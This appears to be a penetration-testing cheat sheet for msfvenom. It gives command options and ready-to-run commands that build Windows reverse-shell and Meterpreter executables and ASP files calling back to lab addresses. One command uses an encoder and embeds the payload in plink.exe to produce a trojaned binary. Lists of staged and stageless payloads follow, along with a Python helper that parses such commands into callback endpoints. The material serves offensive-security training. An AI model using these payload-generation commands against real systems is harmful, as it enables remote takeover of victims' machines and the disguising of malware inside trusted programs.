# Msfvenom

![](/files/-M6G6PsGaChKqfm0jQCk)

### Command Options

```
-p, --payload: Payload to use. Specify a '-' or stdin to use custom payloads
-b, --bad-chars: The list of characters to avoid
-f, --format: Output format
-a, --arch: The architecture to use
--platform: The platform of the payload
-v, --var-name: Specify a custom variable name to use for certain output formats
-e, --encoder: The encoder to use
```

{% embed url="<https://www.offensive-security.com/metasploit-unleashed/msfvenom/>" %}

### Examples of Usage

```
msfvenom -l payloads | grep x86
# List payloads

msfvenom -p windows/shell_reverse_tcp --list-options
# Display payload options

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.0.75 LPORT=4444 -f asp -o tcp_shell.asp

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.0.75 LPORT=1234 -f exe -o tcp_shell.exe

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -o shell_reverse.exe

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
# Injection into a PE file

msfvenom -p windows/meterpreter/reverse_https LHOST=10.11.0.5 LPORT=443 -f exe -o met_https_reverse.exe
```

### List of commonly used payloads

```
<Staged>
windows/shell/reverse_tcp  
windows/x64/shell/reverse_tcp
windows/meterpreter/reverse_tcp 
windows/x64/meterpreter/reverse_tcp

<Stageless>
windows/shell_reverse_tcp
windows/x64/shell_reverse_tcp
windows/meterpreter_reverse_tcp 
windows/x64/meterpreter_reverse_tcp
```

### Staged vs Stageless payloads

> Staged payloads are denoted with the use of a forward slash (**/**; e.g. **windows/shell/reverse\_tcp**). Staged payloads send a small stager to the target, which connects back to the attacker and downloads the rest of the payload. Therefore, staged payloads need special payload listeners, such as **multi/handler** in Metasploit. Staged payloads are ideal in situations where you have limited shellcode space, most commonly in Buffer Overflows (but that’s a story for another day).
>
> Stageless payloads are denoted with the use of an underscore (**\_**; e.g. **windows/shell\_reverse\_tcp**). Stageless payloads send the entire payload to the target at once, and therefore don’t require the attacker to provide more data. That means we have a variety of listeners we can use, such as Netcat. Find out how to set up a listener using Netcat/Ncat in my post [here](https://medium.com/@PenTest_duck/offensive-netcat-ncat-from-port-scanning-to-bind-shell-ip-whitelisting-834689b103da?source=friends_link\&sk=774174bfcb283864cf4468d2db460d0e).

{% embed url="<https://medium.com/@PenTest_duck/offensive-msfvenom-from-generating-shellcode-to-creating-trojans-4be10179bb86>" %}
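The slash/underscore naming rule quoted above, applied to command lines like those under Examples of Usage, so that command history or engagement notes can be reduced to a list of callback endpoints and whether each one needs a second stage served. This is an added example, not code from the original page or from the Metasploit project. The function names and record keys are assumptions, and only the `windows/[x64/]...` names listed on this page are handled; other payload families are not guaranteed to follow the same shape.

```python
import shlex

# Flags that take a value; all of them appear in this page's option list or examples.
VALUE_FLAGS = {"-p": "payload", "--payload": "payload", "-f": "format",
               "--format": "format", "-e": "encoder", "--encoder": "encoder",
               "-a": "arch", "--arch": "arch", "--platform": "platform",
               "-i": "iterations", "-x": "template", "-o": "output"}


def classify_payload(name):
    """Apply the page's rule: stage/stager is staged, stage_stager is stageless.

    Assumption: only the windows/[x64/]... names listed on this page are handled.
    """
    parts = name.split("/")
    if len(parts) < 2 or parts[0] != "windows":
        raise ValueError(f"unsupported payload name: {name!r}")
    rest = parts[1:]
    arch = rest.pop(0) if rest[0] == "x64" else "x86"
    if len(rest) == 2:                       # e.g. shell/reverse_tcp
        stage, connection, staged = rest[0], rest[1], True
    elif len(rest) == 1 and "_" in rest[0]:  # e.g. shell_reverse_tcp
        stage, connection = rest[0].split("_", 1)
        staged = False
    else:
        raise ValueError(f"unsupported payload name: {name!r}")
    return {"arch": arch, "stage": stage, "connection": connection, "staged": staged}


def parse_msfvenom(cmdline):
    """Return payload, callback endpoint and staging info for one command line."""
    tokens = shlex.split(cmdline)
    if not tokens or tokens[0] != "msfvenom":
        raise ValueError("not an msfvenom command line")
    flags, options = {}, {}
    it = iter(tokens[1:])
    for tok in it:
        if tok in VALUE_FLAGS:
            flags[VALUE_FLAGS[tok]] = next(it, None)
        elif "=" in tok and not tok.startswith("-"):
            key, value = tok.split("=", 1)   # datastore option such as LHOST=...
            options[key.upper()] = value
    if "payload" not in flags:
        return None                          # listing command, e.g. "msfvenom -l payloads"
    record = classify_payload(flags["payload"])
    record.update(payload=flags["payload"], format=flags.get("format"),
                  lhost=options.get("LHOST"), lport=options.get("LPORT"))
    return record
```

A record with `staged` set to `True` marks a payload whose handler must deliver the second stage; `lhost` and `lport` are kept as the strings given on the command line.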

### Links

{% embed url="<https://www.hackingarticles.in/msfvenom-tutorials-beginners/>" %}

{% embed url="<https://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload/>" %}

{% embed url="<https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom>" %}

{% embed url="<https://netsec.ws/?p=331>" %}

